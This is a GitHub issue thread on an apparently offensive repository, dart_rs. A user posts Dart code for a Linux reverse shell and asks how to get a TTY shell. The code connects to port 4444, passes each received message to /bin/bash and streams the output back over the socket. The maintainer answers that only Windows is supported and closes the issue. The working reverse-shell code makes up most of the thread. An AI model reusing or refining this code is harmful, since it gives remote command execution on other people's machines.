### ISSUE TITLE
How do I do this with linux?

### ISSUE THREAD

**Issue by viniciusddrft** [s-w-1-t-c-h/dart_rs#1]
i did some tests but i didn't get a result as good as in windows, my best test below.

dart version: 2.14.3

  Socket.connect("127.0.0.1", 4444).then(
    (Socket socket) => socket.listen(
      (Uint8List data) =>
          Process.start('/bin/bash', []).then((Process process) {
        process.stdin.writeln(String.fromCharCodes(data).trim());
        process.stdout.transform(utf8.decoder).listen((String output) {
          socket.write(output);
          socket.flush();
        });
        process.stderr.transform(utf8.decoder).listen((String output) {
          socket.write(output);
          socket.flush();
        });
      }),
      onDone: () => socket.destroy(),
    ),

I was looking for a tty shell

**Comment by s-w-1-t-c-h** [comment]
Sorry, only focused on Windows at this time. Will close this.
